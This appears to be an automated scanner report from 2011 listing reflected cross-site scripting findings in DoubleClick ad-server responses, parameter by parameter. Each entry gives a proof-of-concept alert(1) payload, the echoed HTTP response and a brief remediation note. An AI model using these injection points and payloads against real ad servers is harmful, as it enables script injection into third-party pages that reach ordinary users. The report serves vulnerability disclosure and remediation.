<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 0%3B0%3B65129193%3B4307-300/250%3B42514095/42531882/1%3Bu%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939d4efc"-alert(1)-"09524b1daae&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ...[SNIP]...
The value of the _c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5bef7"-alert(1)-"e411786e44c was submitted in the _c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6781
Date: Tue, 28 Jun 2011 02:14:15 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... B42514095/42531882/1%3Bu%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=184421635bef7"-alert(1)-"e411786e44c&_pm=97956&_pn=18499500&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = " ...[SNIP]...
The value of the _d request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebf06"-alert(1)-"f9932b774ce was submitted in the _d parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6781
Date: Tue, 28 Jun 2011 02:13:54 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 07-300/250%3B42514095/42531882/1%3Bu%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228ebf06"-alert(1)-"f9932b774ce&_c=18442163&_pm=97956&_pn=18499500&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscri ...[SNIP]...
The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee414"-alert(1)-"0759993d50b was submitted in the _eo parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6781
Date: Tue, 28 Jun 2011 02:12:28 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 0%3B%7Efdr%3D242306880%3B0-0%3B0%3B65129193%3B4307-300/250%3B42514095/42531882/1%3Bu%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956ee414"-alert(1)-"0759993d50b&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about"); var fscUrl = url; var fscUrlClickTagFound = false; var ...[SNIP]...
The value of the _et request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee567"-alert(1)-"51b02d198a9 was submitted in the _et parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6781
Date: Tue, 28 Jun 2011 02:12:49 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 2306880%3B0-0%3B0%3B65129193%3B4307-300/250%3B42514095/42531882/1%3Bu%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069ee567"-alert(1)-"51b02d198a9&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque ...[SNIP]...
The value of the _o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c823"-alert(1)-"7422a3948b0 was submitted in the _o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6781
Date: Tue, 28 Jun 2011 02:12:07 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... %3D18499500%3B%7Efdr%3D242306880%3B0-0%3B0%3B65129193%3B4307-300/250%3B42514095/42531882/1%3Bu%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=184421361c823"-alert(1)-"7422a3948b0&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about"); var fscUrl = url; var fscUrlClickTagFound = fa ...[SNIP]...
The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 870d7"-alert(1)-"e17bcc3401c was submitted in the _pm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6781
Date: Tue, 28 Jun 2011 02:14:36 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 42531882/1%3Bu%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956870d7"-alert(1)-"e17bcc3401c&_pn=18499500&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a245"-alert(1)-"cb1a8ffbfb9 was submitted in the _pn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6781
Date: Tue, 28 Jun 2011 02:14:57 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... u%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=184995007a245"-alert(1)-"cb1a8ffbfb9&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the _s request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42d25"-alert(1)-"54e88c0450 was submitted in the _s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6777
Date: Tue, 28 Jun 2011 02:13:32 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 5129193%3B4307-300/250%3B42514095/42531882/1%3Bu%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=1168342d25"-alert(1)-"54e88c0450&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var ...[SNIP]...
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92266"-alert(1)-"754641c9b37 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6667
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 02:15:09 GMT
Expires: Tue, 28 Jun 2011 02:15:09 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 3B%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=92266"-alert(1)-"754641c9b37http://learn.strayeruniversity.edu/about"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb6a7"-alert(1)-"38985baca84 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6781
Date: Tue, 28 Jun 2011 02:11:49 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 515392/1%3Bu%3D18499500%3B%7Efdr%3D242306880%3B0-0%3B0%3B65129193%3B4307-300/250%3B42514095/42531882/1%3Bu%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245bb6a7"-alert(1)-"38985baca84&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about"); var fscUrl = url; var fscUrlClickT ...[SNIP]...
The value of the _a request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 247bf"-alert(1)-"bcccf64206b was submitted in the _a parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5631
Date: Tue, 28 Jun 2011 03:07:00 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla ...[SNIP]... B0-0%3B0%3B63909454%3B4307-300/250%3B42097871/42115658/1%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428247bf"-alert(1)-"bcccf64206b&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/ticket_hotel.html%3F__source%3Domd_hotel_Outer_xplusone"); var wmode = "opaque"; var bg ...[SNIP]...
The value of the _c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93190"-alert(1)-"bf63948427f was submitted in the _c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5739
Date: Tue, 28 Jun 2011 03:08:15 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla ...[SNIP]... 0%3B42097871/42115658/1%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=1793440593190"-alert(1)-"bf63948427f&_pm=97956&_pn=17941001&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/offer_kongsummerlanding_1weekpass.html%3F__source%3Domd_1week_Outer_xplusone"); var wmode = "opaque"; var bg = "same as S ...[SNIP]...
The value of the _d request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2df8"-alert(1)-"1d6528d0a37 was submitted in the _d parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5741
Date: Tue, 28 Jun 2011 03:07:51 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla ...[SNIP]... B4307-300/250%3B42097871/42115658/1%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341f2df8"-alert(1)-"1d6528d0a37&_c=17934405&_pm=97956&_pn=17941001&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/offer_kongsummerlanding_fol.html%3F__source%3Domd_fol_Outer_xplusone"); var wmode = "opaque"; var bg = "same ...[SNIP]...
The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14dab"-alert(1)-"15ea4c0569c was submitted in the _eo parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5631
Date: Tue, 28 Jun 2011 03:06:11 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla ...[SNIP]... 1001%3B%7Efdr%3D241109365%3B0-0%3B0%3B63909454%3B4307-300/250%3B42097871/42115658/1%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=9795614dab"-alert(1)-"15ea4c0569c&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/ticket_hotel.html%3F__source%3Domd_hotel_Outer_xplusone"); va ...[SNIP]...
The value of the _et request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd794"-alert(1)-"41d93ebe777 was submitted in the _et parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5668
Date: Tue, 28 Jun 2011 03:06:38 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla ...[SNIP]... D241109365%3B0-0%3B0%3B63909454%3B4307-300/250%3B42097871/42115658/1%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288dd794"-alert(1)-"41d93ebe777&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/offer_2nddayfree.html%3F__source%3Domd_2df_Outer_xplusone"); var wmode = "op ...[SNIP]...
The value of the _o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a54e"-alert(1)-"f7737f749a5 was submitted in the _o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5725
Date: Tue, 28 Jun 2011 03:05:49 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla ...[SNIP]... 3Bu%3D17941001%3B%7Efdr%3D241109365%3B0-0%3B0%3B63909454%3B4307-300/250%3B42097871/42115658/1%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=156493a54e"-alert(1)-"f7737f749a5&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/offer_kong_2nddayfree.html%3F__source%3Domd_2df_Out ...[SNIP]...
The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8672a"-alert(1)-"4eda465726c was submitted in the _pm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5735
Date: Tue, 28 Jun 2011 03:08:40 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla ...[SNIP]... 71/42115658/1%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=979568672a"-alert(1)-"4eda465726c&_pn=17941001&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/offer_kong_2nddayfree.html%3F__source%3Domd_2df_Outer_xplusone"); var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptac ...[SNIP]...
The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7281a"-alert(1)-"90e990131bf was submitted in the _pn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5631
Date: Tue, 28 Jun 2011 03:09:05 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla ...[SNIP]... %3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=179410017281a"-alert(1)-"90e990131bf&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/ticket_hotel.html%3F__source%3Domd_hotel_Outer_xplusone"); var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptaccess = "never";
The value of the _s request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2c87"-alert(1)-"ae535e6c623 was submitted in the _s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5739
Date: Tue, 28 Jun 2011 03:07:24 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla ...[SNIP]... 3B63909454%3B4307-300/250%3B42097871/42115658/1%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683c2c87"-alert(1)-"ae535e6c623&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/offer_kongsummerlanding_1weekpass.html%3F__source%3Domd_1week_Outer_xplusone"); var wmode = "opaq ...[SNIP]...
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43b35"-alert(1)-"26719022c54 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5359
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 03:09:20 GMT
Expires: Tue, 28 Jun 2011 03:09:20 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla ...[SNIP]... /1%3B%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=43b35"-alert(1)-"26719022c54http://www.universalstudioshollywood.com/ticket_hotel.html?__source=omd_hotel_Outer_xplusone"); var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptaccess = "never";
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e982d"-alert(1)-"af7369214d was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5664
Date: Tue, 28 Jun 2011 03:05:29 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla ...[SNIP]... 966987/1%3Bu%3D17941001%3B%7Efdr%3D241109365%3B0-0%3B0%3B63909454%3B4307-300/250%3B42097871/42115658/1%3Bu%3D17941001%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=6ac82102-85d1-4238-beff-050652183930e982d"-alert(1)-"af7369214d&_o=15649&_eo=97956&_et=1309230288&_a=17934428&_s=11683&_d=17940341&_c=17934405&_pm=97956&_pn=17941001&redirect=http%3a%2f%2fwww.universalstudioshollywood.com/offer_2nddayfree.html%3F__source%3Domd_2df ...[SNIP]...
The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2da41"-alert(1)-"e30b3cebf4a was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8fbf"-alert(1)-"08481952506 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c38e3"-alert(1)-"32d625406f was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9d41"-alert(1)-"4c11fe208dc was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97a47"-alert(1)-"b6016578f1 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54176"-alert(1)-"35e05f8a498 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
